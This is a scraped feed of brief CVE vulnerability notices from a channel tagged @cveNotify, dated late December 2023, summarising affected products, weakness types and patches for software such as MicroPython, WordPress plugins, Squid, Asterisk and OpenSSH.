🚨 CVE-2023-7152A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-29 08:24:32 |
🚨 CVE-2023-43314** UNSUPPORTED WHEN ASSIGNED **The buffer overflow vulnerability in the Zyxel PMG2005-T20B firmware version V1.00(ABNK.2)b11_C0 could allow an unauthenticated attacker to cause a denial of service condition via a crafted uid.🎖@cveNotify |
|
| 2023-12-29 07:24:38 |
🚨 CVE-2023-7158A vulnerability was found in MicroPython up to 1.21.0. It has been classified as critical. Affected is the function slice_indices of the file objslice.c. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.22.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249180.🎖@cveNotify |
|
| 2023-12-29 07:24:37 |
🚨 CVE-2023-23634SQL Injection vulnerability in Documize version 5.4.2, allows remote attackers to execute arbitrary code via the user parameter of the /api/dashboard/activity endpoint.🎖@cveNotify |
|
| 2023-12-29 07:24:34 |
🚨 CVE-2023-6228An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash.🎖@cveNotify |
|
| 2023-12-29 07:24:33 |
🚨 CVE-2022-45854An improper check for unusual conditions in Zyxel NWA110AX firmware verisons prior to 6.50(ABTG.0)C0, which could allow a LAN attacker to cause a temporary denial-of-service (DoS) by sending crafted VLAN frames if the MAC address of the vulnerable AP were intercepted by the attacker.🎖@cveNotify |
|
| 2023-12-29 07:24:32 |
🚨 CVE-2022-43391A buffer overflow vulnerability in the parameter of the CGI program in Zyxel NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an authenticated attacker to cause denial-of-service (DoS) conditions by sending a crafted HTTP request.🎖@cveNotify |
|
| 2023-12-29 06:54:40 |
🚨 CVE-2023-47525Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in A WP Life Event Monster – Event Management, Tickets Booking, Upcoming Event allows Stored XSS.This issue affects Event Monster – Event Management, Tickets Booking, Upcoming Event: from n/a through 1.3.2.🎖@cveNotify |
|
| 2023-12-29 06:54:33 |
🚨 CVE-2023-35916Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo.This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.🎖@cveNotify |
|
| 2023-12-29 06:54:32 |
🚨 CVE-2023-35914Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions.This issue affects Woo Subscriptions: from n/a through 5.1.2.🎖@cveNotify |
|
| 2023-12-29 06:24:51 |
🚨 CVE-2023-7099A vulnerability, which was classified as critical, has been found in PHPGurukul Nipah Virus Testing Management System 1.0. This issue affects some unknown processing of the file bwdates-report-result.php. The manipulation of the argument fromdate leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248951.🎖@cveNotify |
|
| 2023-12-29 06:24:45 |
🚨 CVE-2023-6744The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'et_pb_text' shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-12-29 06:24:44 |
🚨 CVE-2023-6972The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the 'content-backups' and 'content-name', 'content-manifest', or 'content-bmitmp' and 'content-identy' HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.🎖@cveNotify |
|
| 2023-12-29 06:24:43 |
🚨 CVE-2023-6971The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the 'content-dir' HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server's php.ini is configured with 'allow_url_include' set to 'on'. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP.🎖@cveNotify |
|
| 2023-12-29 06:24:39 |
🚨 CVE-2023-7075A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-29 06:24:38 |
🚨 CVE-2023-7038A vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-29 06:24:33 |
🚨 CVE-2023-7036A vulnerability was found in automad up to 1.10.9. It has been classified as problematic. This affects the function upload of the file FileCollectionController.php of the component Content Type Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-29 06:24:32 |
🚨 CVE-2022-43450Authorization Bypass Through User-Controlled Key vulnerability in XWP Stream.This issue affects Stream: from n/a through 3.9.2.🎖@cveNotify |
|
| 2023-12-29 05:24:38 |
🚨 CVE-2023-7155A vulnerability, which was classified as critical, was found in SourceCodester Free and Open Source Inventory Management System 1.0. This affects an unknown part of the file /ample/app/action/edit_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249177 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-29 05:24:33 |
🚨 CVE-2023-6134A flaw was found in Keycloak that prevents certain schemes in redirects, but permits them if a wildcard is appended to the token. This issue could allow an attacker to submit a specially crafted request leading to cross-site scripting (XSS) or further attacks. This flaw is the result of an incomplete fix for CVE-2020-10748.🎖@cveNotify |
|
| 2023-12-29 05:24:32 |
🚨 CVE-2023-4154A design flaw was found in Samba's DirSync control implementation, which exposes passwords and secrets in Active Directory to privileged users and Read-Only Domain Controllers (RODCs). This flaw allows RODCs and users possessing the GET_CHANGES right to access all attributes, including sensitive secrets and passwords. Even in a default setup, RODC DC accounts, which should only replicate some passwords, can gain access to all domain secrets, including the vital krbtgt, effectively eliminating the RODC / DC distinction. Furthermore, the vulnerability fails to account for error conditions (fail open), like out-of-memory situations, potentially granting access to secret attributes, even under low-privileged attacker influence.🎖@cveNotify |
|
| 2023-12-29 04:54:32 |
🚨 CVE-2023-50828Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Vongries Ultimate Dashboard – Custom WordPress Dashboard allows Stored XSS.This issue affects Ultimate Dashboard – Custom WordPress Dashboard: from n/a through 3.7.11.🎖@cveNotify |
|
| 2023-12-29 04:24:50 |
🚨 CVE-2023-52174XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3125D6.🎖@cveNotify |
|
| 2023-12-29 04:24:49 |
🚨 CVE-2023-51435Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak.🎖@cveNotify |
|
| 2023-12-29 04:24:45 |
🚨 CVE-2023-51433Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak.🎖@cveNotify |
|
| 2023-12-29 04:24:44 |
🚨 CVE-2023-51431Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions.🎖@cveNotify |
|
| 2023-12-29 04:24:43 |
🚨 CVE-2023-51430Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak.🎖@cveNotify |
|
| 2023-12-29 04:24:40 |
🚨 CVE-2023-51428Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak.🎖@cveNotify |
|
| 2023-12-29 04:24:39 |
🚨 CVE-2023-51426Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak.🎖@cveNotify |
|
| 2023-12-29 04:24:38 |
🚨 CVE-2023-31296CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows attackers to obtain sensitive information via the User Name field.🎖@cveNotify |
|
| 2023-12-29 04:24:34 |
🚨 CVE-2023-23442Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak.🎖@cveNotify |
|
| 2023-12-29 04:24:33 |
🚨 CVE-2023-50823Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wipeout Media CSS & JavaScript Toolbox allows Stored XSS.This issue affects CSS & JavaScript Toolbox: from n/a through 11.7.🎖@cveNotify |
|
| 2023-12-29 03:54:45 |
🚨 CVE-2023-50831Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VillaTheme CURCY – Multi Currency for WooCommerce allows Stored XSS.This issue affects CURCY – Multi Currency for WooCommerce: from n/a through 2.2.0.🎖@cveNotify |
|
| 2023-12-29 03:24:46 |
🚨 CVE-2023-45120Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'qid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-29 03:24:40 |
🚨 CVE-2023-47267An issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to memory mapped file.🎖@cveNotify |
|
| 2023-12-29 03:24:39 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2023-12-29 03:24:38 |
🚨 CVE-2023-50269Squid is a caching proxy for the Web. Due to an Uncontrolled Recursion bug in versions 2.6 through 2.7.STABLE9, versions 3.1 through 5.9, and versions 6.0.1 through 6.5, Squid may be vulnerable to a Denial of Service attack against HTTP Request parsing. This problem allows a remote client to perform Denial of Service attack by sending a large X-Forwarded-For header when the follow_x_forwarded_for feature is configured. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives.🎖@cveNotify |
|
| 2023-12-29 03:24:34 |
🚨 CVE-2023-49286Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to an Incorrect Check of Function Return Value bug Squid is vulnerable to a Denial of Service attack against its Helper process management. This bug is fixed by Squid version 6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-29 03:24:33 |
🚨 CVE-2023-46724Squid is a caching proxy for the Web. Due to an Improper Validation of Specified Index bug, Squid versions 3.3.0.1 through 5.9 and 6.0 prior to 6.4 compiled using `--with-openssl` are vulnerable to a Denial of Service attack against SSL Certificate validation. This problem allows a remote server to perform Denial of Service against Squid Proxy by initiating a TLS Handshake with a specially crafted SSL Certificate in a server certificate chain. This attack is limited to HTTPS and SSL-Bump. This bug is fixed in Squid version 6.4. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. Those who you use a prepackaged version of Squid should refer to the package vendor for availability information on updated packages.🎖@cveNotify |
|
| 2023-12-29 02:24:32 |
🚨 CVE-2023-29485An issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to bypass network filtering, execute arbitrary code, and obtain sensitive information via DarkLayer Guard threat prevention module.🎖@cveNotify |
|
| 2023-12-29 01:24:40 |
🚨 CVE-2021-28451Microsoft Excel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-29 01:24:34 |
🚨 CVE-2021-28450Microsoft SharePoint Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-29 01:24:33 |
🚨 CVE-2021-27067Azure DevOps Server and Team Foundation Server Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-29 01:24:32 |
🚨 CVE-2021-27064Visual Studio Installer Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 00:24:45 |
🚨 CVE-2023-49294Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.🎖@cveNotify |
|
| 2023-12-29 00:24:39 |
🚨 CVE-2023-37457Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.🎖@cveNotify |
|
| 2023-12-29 00:24:38 |
🚨 CVE-2022-43680In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations.🎖@cveNotify |
|
| 2023-12-29 00:24:37 |
🚨 CVE-2021-31204.NET and Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 00:24:33 |
🚨 CVE-2021-31177Microsoft Office Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-29 00:24:32 |
🚨 CVE-2012-5639LibreOffice and OpenOffice automatically open embedded content🎖@cveNotify |
|
| 2023-12-28 23:24:33 |
🚨 CVE-2021-31980Microsoft Intune Management Extension Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-28 23:24:32 |
🚨 CVE-2021-31938Microsoft VsCode Kubernetes Tools Extension Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-28 22:24:32 |
🚨 CVE-2022-36399Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BoxyStudio Booked - Appointment Booking for WordPress | Calendars.This issue affects Booked - Appointment Booking for WordPress | Calendars: from n/a before 2.4.4.🎖@cveNotify |
|
| 2023-12-28 21:24:32 |
🚨 CVE-2022-47502Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose.Links can be activated by clicks, or by automatic document events.The execution of such links must be subject to user approval.In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution.🎖@cveNotify |
|
| 2023-12-28 20:54:37 |
🚨 CVE-2023-45127Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'wrong' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-28 20:54:33 |
🚨 CVE-2023-45125Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'time' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-28 20:54:32 |
🚨 CVE-2023-4489The first S0 encryption key is generated with an uninitialized PRNG in Z/IP Gateway products running Silicon Labs Z/IP Gateway SDK v7.18.3 and earlier. This makes the first S0 key generated at startup predictable, potentially allowing network key prediction and unauthorized S0 network access.🎖@cveNotify |
|
| 2023-12-28 20:24:41 |
🚨 CVE-2021-26429Azure Sphere Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-28 20:24:34 |
🚨 CVE-2021-26428Azure Sphere Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-28 20:24:33 |
🚨 CVE-2021-26424Windows TCP/IP Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-28 20:24:32 |
🚨 CVE-2021-26423.NET Core and Visual Studio Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-28 19:54:33 |
🚨 CVE-2022-24036Karmasis Informatics Infraskope SIEM+ has an unauthenticated access vulnerability which could allow an unauthenticated attacker to modificate logs.🎖@cveNotify |
|
| 2023-12-28 19:54:32 |
🚨 CVE-2005-1688Wordpress 1.5 and earlier allows remote attackers to obtain sensitive information via a direct request to files in (1) wp-content/themes/, (2) wp-includes/, or (3) wp-admin/, which reveal the path in an error message.🎖@cveNotify |
|
| 2023-12-28 19:24:40 |
🚨 CVE-2021-20191A flaw was found in ansible. Credentials, such as secrets, are being disclosed in console log by default and not protected by no_log feature when using those modules. An attacker can take advantage of this information to steal those credentials. The highest threat from this vulnerability is to data confidentiality. Versions before ansible 2.9.18 are affected.🎖@cveNotify |
|
| 2023-12-28 19:24:33 |
🚨 CVE-2020-7122Two memory corruption vulnerabilities in the Aruba CX Switches Series 6200F, 6300, 6400, 8320, 8325, and 8400 have been found. Successful exploitation of these vulnerabilities could result in Local Denial of Service of the CDP (Cisco Discovery Protocol) process in the switch. This applies to firmware versions prior to 10.04.1000.🎖@cveNotify |
|
| 2023-12-28 19:24:32 |
🚨 CVE-2019-10206ansible-playbook -k and ansible cli tools, all versions 2.8.x before 2.8.4, all 2.7.x before 2.7.13 and all 2.6.x before 2.6.19, prompt passwords by expanding them from templates as they could contain special characters. Passwords should be wrapped to prevent templates trigger and exposing them.🎖@cveNotify |
|
| 2023-12-28 18:54:40 |
🚨 CVE-2023-6691Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges.🎖@cveNotify |
|
| 2023-12-28 18:54:34 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2023-12-28 18:54:33 |
🚨 CVE-2021-20678SQL injection vulnerability in the Paid Memberships Pro versions prior to 2.5.6 allows remote authenticated attackers to execute arbitrary SQL commands via unspecified vectors.🎖@cveNotify |
|
| 2023-12-28 18:24:38 |
🚨 CVE-2023-6228An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash.🎖@cveNotify |
|
| 2023-12-28 18:24:33 |
🚨 CVE-2023-42183lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.🎖@cveNotify |
|
| 2023-12-28 18:24:32 |
🚨 CVE-2014-9940The regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel before 3.19 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.🎖@cveNotify |
|
| 2023-12-28 17:54:38 |
🚨 CVE-2023-48231Vim is an open source command line text editor. When closing a window, vim may try to access already freed window structure. Exploitation beyond crashing the application has not been shown to be viable. This issue has been addressed in commit `25aabc2b` which has been included in release version 9.0.2106. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-28 17:54:37 |
🚨 CVE-2021-46758Insufficient validation of SPI flash addresses in the ASP (AMD Secure Processor) bootloader may allow an attacker to read data in memory mapped beyond SPI flash resulting in a potential loss of availability and integrity.🎖@cveNotify |
|
| 2023-12-28 17:54:34 |
🚨 CVE-2023-47365The leakage of channel access token in Lil.OFF-PRICE STORE Line 13.6.1 allows remote attackers to send malicious notifications to victims.🎖@cveNotify |
|
| 2023-12-28 17:54:33 |
🚨 CVE-2023-47363The leakage of channel access token in F.B.P members Line 13.6.1 allows remote attackers to send malicious notifications to victims.🎖@cveNotify |
|
| 2023-12-28 17:54:32 |
🚨 CVE-2020-36754The Paid Memberships Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.2. This is due to missing or incorrect nonce validation on the pmpro_page_save() function. This makes it possible for unauthenticated attackers to save pages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-12-28 17:24:48 |
🚨 CVE-2023-48719Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'roll_no' parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-28 17:24:47 |
🚨 CVE-2023-1514A vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by using faking the identity of a RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface.🎖@cveNotify |
|
| 2023-12-28 17:24:44 |
🚨 CVE-2023-6932A use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation.A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.🎖@cveNotify |
|
| 2023-12-28 17:24:43 |
🚨 CVE-2019-25158A vulnerability has been found in pedroetb tts-api up to 2.1.4 and classified as critical. This vulnerability affects the function onSpeechDone of the file app.js. The manipulation leads to os command injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 29d9c25415911ea2f8b6de247cb5c4607d13d434. It is recommended to upgrade the affected component. VDB-248278 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-28 17:24:42 |
🚨 CVE-2023-6945A vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-28 17:24:38 |
🚨 CVE-2023-4295A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory.🎖@cveNotify |
|
| 2023-12-28 17:24:37 |
🚨 CVE-2023-35185The SolarWinds Access Rights Manager was susceptible to a Directory Traversal Remote Code Vulnerability using SYSTEM privileges.🎖@cveNotify |
|
| 2023-12-28 17:24:33 |
🚨 CVE-2023-3622Access Control Bypass Vulnerability in the SolarWinds Platform that allows an underprivileged user to read arbitrary resource🎖@cveNotify |
|
| 2023-12-28 17:24:32 |
🚨 CVE-2019-16892In Rubyzip before 1.3.0, a crafted ZIP file can bypass application checks on ZIP entry sizes because data about the uncompressed size can be spoofed. This allows attackers to cause a denial of service (disk consumption).🎖@cveNotify |
|
| 2023-12-28 16:54:45 |
🚨 CVE-2023-49148Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates.This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5.🎖@cveNotify |
|
| 2023-12-28 16:24:45 |
🚨 CVE-2021-40442Microsoft Excel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-28 16:24:39 |
🚨 CVE-2021-38666Remote Desktop Client Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-28 16:24:38 |
🚨 CVE-2021-36957Windows Desktop Bridge Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-28 16:24:37 |
🚨 CVE-2021-26444Azure RTOS Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-28 16:24:34 |
🚨 CVE-2021-26443Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-28 16:24:33 |
🚨 CVE-2021-40457Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability🎖@cveNotify |
|
| 2023-12-28 16:24:32 |
🚨 CVE-2019-13147In Audio File Library (aka audiofile) 0.3.6, there exists one NULL pointer dereference bug in ulaw2linear_buf in G711.cpp in libmodules.a that allows an attacker to cause a denial of service via a crafted file.🎖@cveNotify |
|
| 2023-12-28 15:54:43 |
🚨 CVE-2023-50825Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Terrier Tenacity iframe Shortcode allows Stored XSS.This issue affects iframe Shortcode: from n/a through 2.0.🎖@cveNotify |
|
| 2023-12-28 15:54:39 |
🚨 CVE-2023-38200A flaw was found in Keylime. Due to their blocking nature, the Keylime registrar is subject to a remote denial of service against its SSL connections. This flaw allows an attacker to exhaust all available connections.🎖@cveNotify |
|
| 2023-12-28 15:54:38 |
🚨 CVE-2008-5183cupsd in CUPS 1.3.9 and earlier allows local users, and possibly remote attackers, to cause a denial of service (daemon crash) by adding a large number of RSS Subscriptions, which triggers a NULL pointer dereference. NOTE: this issue can be triggered remotely by leveraging CVE-2008-5184.🎖@cveNotify |
|
| 2023-12-28 15:54:37 |
🚨 CVE-2008-3597Skulltag before 0.97d2-RC6 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by sending a "command 29" packet when the player is not in the game.🎖@cveNotify |
|
| 2023-12-28 15:54:34 |
🚨 CVE-2008-0062KDC in MIT Kerberos 5 (krb5kdc) does not set a global variable for some krb4 message types, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted messages that trigger a NULL pointer dereference or double-free.🎖@cveNotify |
|
| 2023-12-28 15:24:51 |
🚨 CVE-2023-34829Incorrect access control in TP-Link Tapo before v3.1.315 allows attackers to access user credentials in plaintext.🎖@cveNotify |
|
| 2023-12-28 15:24:50 |
🚨 CVE-2023-6879Increasing the resolution of video frames, while performing a multi-threaded encode, can result in a heap overflow in av1_loop_restoration_dealloc().🎖@cveNotify |
|
| 2023-12-28 15:24:45 |
🚨 CVE-2023-49002An issue in Xenom Technologies (sinous) Phone Dialer-voice Call Dialer v.1.2.5 allows an attacker to bypass intended access restrictions via interaction with com.funprime.calldialer.ui.activities.OutgoingActivity.🎖@cveNotify |
|
| 2023-12-28 15:24:44 |
